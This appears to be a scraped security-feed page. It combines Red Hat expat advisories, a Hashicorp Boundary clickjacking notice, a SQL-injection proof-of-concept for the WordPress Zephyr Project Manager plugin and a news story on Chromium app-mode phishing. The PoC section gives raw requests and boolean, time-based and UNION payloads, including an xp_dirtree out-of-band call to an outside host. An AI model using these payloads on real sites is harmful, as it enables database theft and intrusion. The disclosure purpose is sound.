expat-static-2.1.0-15.el7_9.s390x.rpm

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
expat-2.1.0-15.el7_9.src.rpm

x86_64:  
expat-2.1.0-15.el7_9.i686.rpm  
expat-2.1.0-15.el7_9.x86_64.rpm  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-devel-2.1.0-15.el7_9.i686.rpm  
expat-devel-2.1.0-15.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
expat-debuginfo-2.1.0-15.el7_9.i686.rpm  
expat-debuginfo-2.1.0-15.el7_9.x86_64.rpm  
expat-static-2.1.0-15.el7_9.i686.rpm  
expat-static-2.1.0-15.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7sqdzjgjWX9erEAQjxyA//VKee7fxyq3Bih4oJvm9Lexgt4hgej3nR  
fJvpW6n+WTV6RRGtSSD37Lif1kav3bFiQBI4u2ZDrfEQ6ZETIcl6wKANdMI4zxYk  
Nh1CAxuWtnJsqQqu4pyViMT5pP5UgbO0suKps2TSTjq7f2Hok0IkLjEhqFlrfBA1  
owK2Pk6OltAvGKqLJuV9+MIgFGZNei5vuHCQwYS3V+CGXZpAnWwfRt69S2vRAOb0  
CB5eR4yF+IGn3eEebkArFEF97eGR9kqS4o63etEqMdoQ70FaPJKe9YM/y41Q/4gV  
/gD5H6caQk6ShO/O4UmabTw5TeiKzl7tJMxdYTd3rpBEZFNQiye45++4YY64+z0o  
uSNST+1PSz/8o+3XrpFKzs//ePLhYttC9/mLIIcVnrO1l3HTwKCP5rylMb/E3pJS  
Hc4QEUMw6orsFzNpMVtN9uiX23/Xzy1W4avKxlKSyf3PraXhiwz/GOz0R7mtaOKZ  
xH/8Pt3qKbOsCtmTx/SYx2ALqOm3jEC5s3zXfWjoFM6Um7wLYu1U2uWeuMHk5Hsu  
A2OADrOyY/88JODsLsugVVpvrAX0LrY8GOdXM1ZVRb2URdYL51bfQyEf2YEewplx  
x06H6MonBt/ZjLC4fba+v/yeM9TvdcDd7M7SgfEqwBniFhyTLUBWab00AR4t8ngY  
J17i8lcjGUc=IVzO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6834-01

Red Hat Security Advisory 2022-6833-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: expat security update  
Advisory ID:       RHSA-2022:6833-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6833  
Issue date:        2022-10-06  
CVE Names:         CVE-2022-40674  
====================================================================  
1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: a use-after-free in the doContent function in xmlparse.c  
(CVE-2022-40674)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, applications using the Expat library  
must be restarted for the update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.1):

Source:  
expat-2.2.5-3.el8_1.2.src.rpm

aarch64:  
expat-2.2.5-3.el8_1.2.aarch64.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.aarch64.rpm  
expat-debugsource-2.2.5-3.el8_1.2.aarch64.rpm  
expat-devel-2.2.5-3.el8_1.2.aarch64.rpm

ppc64le:  
expat-2.2.5-3.el8_1.2.ppc64le.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.ppc64le.rpm  
expat-debugsource-2.2.5-3.el8_1.2.ppc64le.rpm  
expat-devel-2.2.5-3.el8_1.2.ppc64le.rpm

s390x:  
expat-2.2.5-3.el8_1.2.s390x.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.s390x.rpm  
expat-debugsource-2.2.5-3.el8_1.2.s390x.rpm  
expat-devel-2.2.5-3.el8_1.2.s390x.rpm

x86_64:  
expat-2.2.5-3.el8_1.2.i686.rpm  
expat-2.2.5-3.el8_1.2.x86_64.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.i686.rpm  
expat-debuginfo-2.2.5-3.el8_1.2.x86_64.rpm  
expat-debugsource-2.2.5-3.el8_1.2.i686.rpm  
expat-debugsource-2.2.5-3.el8_1.2.x86_64.rpm  
expat-devel-2.2.5-3.el8_1.2.i686.rpm  
expat-devel-2.2.5-3.el8_1.2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-40674  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7sntzjgjWX9erEAQilzg/9G0hBlNyYGAOEQ2Wd1hoaviKz1x8xQSjk  
6Yp8hYteJ8barDPVG6ZSkOzK0EgwOU2BZem6D8s4jTF3SjYokQlC5qleON1kbV6v  
uegK8apoBsByZZVbpL3ioMcwT0jvoMJkmUhOrQmd8ijnWWBcQsmwVBCP8ej/YJcd  
ugtcxE9GIaXt/KCDg04ly+NaB21Ej2bvHC9IglajZyFglLESCs9aufQcEUIyyYN5  
KHjLdIxmUvs61FsROSB4GH22OABH6v7JAZwIQB3bVr1HVSpU6eUU2ug+DN/sELtk  
0wLZWTUk09V6I2uzF3Og40qsOUmgik5CSbeNrP5j/QAYz7Fys2HYs+ybx9zIMmlw  
t72+MCZO911IxV+CV2ev5qjluOgDcNDWJJVsvjSdiMpsK6d1xe7t224MYqHJLV5v  
93fRMoL//MmF0OMcgNrR8ijooUq1WrxJBIjQQ+imyNezvjevYPnWcl2sfTJIBZAH  
UHblj3RmjTmg9qEl/hxsWqYO+7o7CqzJ49nPxAzvu/F6SKR56SRZwsZnLt/awXLD  
SfO2ff2jZA7Ruq5kvfspzh9EYlsz4117uRlm4jtYXCtnlsR43v3bDPw50oTEgTvm  
OJMkFOVAN5uVSPttPacD0JaIDpeV26ofSakXknA4+lwle9hP1enX5nQ3qkne06Dq  
7vR0gnLs+t4=0lxG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6833-01

Hashicorp Boundary versions prior to 0.9.1 suffer from a clickjacking vulnerability.

    # Exploit Title: Hashicorp Boundary < v0.9.1 - Clickjacking# Date: 07/08/2022# Exploit Author: Brandon Roach (V4quero)# Vendor Homepage: https://releases.hashicorp.com/boundary/# Software Link: https://github.com/hashicorp/boundary# Version: < v.0.9.1# Tested on: Linux# CVE: CVE-2022-36182Attackers can exploit this vulnerability to allow for the interception of login credentials, re-direction of users to malicious sites, or causing users to perform malicious actions on the site.Attack vector:to exploit the vulnerability, an attacker would frame the application and overlay hidden ui elements on the siteReferencehttps://owasp.org/www-community/attacks/Clickjacking

Hashicorp Boundary Clickjacking

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

WordPress Zephyr Project Manager 3.2.42 SQL Injection

In what's a new phishing technique, it has been demonstrated that the Application Mode feature in Chromium-based web browsers can be abused to create "realistic desktop phishing applications."
Application Mode is designed to offer native-like experiences in a manner that causes the website to be launched in a separate browser window, while also displaying the website's favicon and hiding the

In what's a new phishing technique, it has been demonstrated that the Application Mode feature in Chromium-based web browsers can be abused to create "realistic desktop phishing applications."

Application Mode is designed to offer native-like experiences in a manner that causes the website to be launched in a separate browser window, while also displaying the website's favicon and hiding the address bar.

According to security researcher mr.d0x – who also devised the browser-in-the-browser (BitB) attack method earlier this year – a bad actor can leverage this behavior to resort to some HTML/CSS trickery and display a fake address bar on top of the window and fool users into giving up their credentials on rogue login forms.

"Although this technique is meant more towards internal phishing, you can technically still use it in an external phishing scenario," mr.d0x said. "You can deliver these fake applications independently as files."

This is achieved by setting up a phishing page with a fake address bar at the top, and configuring the \--app parameter to point to the phishing site hosting the page.

On top of that, the attacker-controlled phishing site can make use of JavaScript to take more actions, such as closing the window immediately after the user enters the credentials or resizing and positioning it to achieve the desired effect.

It's worth noting that the mechanism works on other operating systems, such as macOS and Linux, making it a potential cross-platform threat. However, the success of the attack is predicated on the fact that the attacker already has access to the target's machine.

That said, Google is phasing out support for Chrome apps in favor of Progressive Web Apps (PWAs) and web-standard technologies, and the feature is expected to be fully discontinued in Chrome 109 or later on Windows, macOS, and Linux.

The findings come as new findings Trustwave SpiderLabs show that HTML smuggling attacks are a common occurrence, with .HTML (11.39%) and .HTM (2.7%) files accounting for the second most spammed file attachment type after .JPG images (25.29%).

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#linux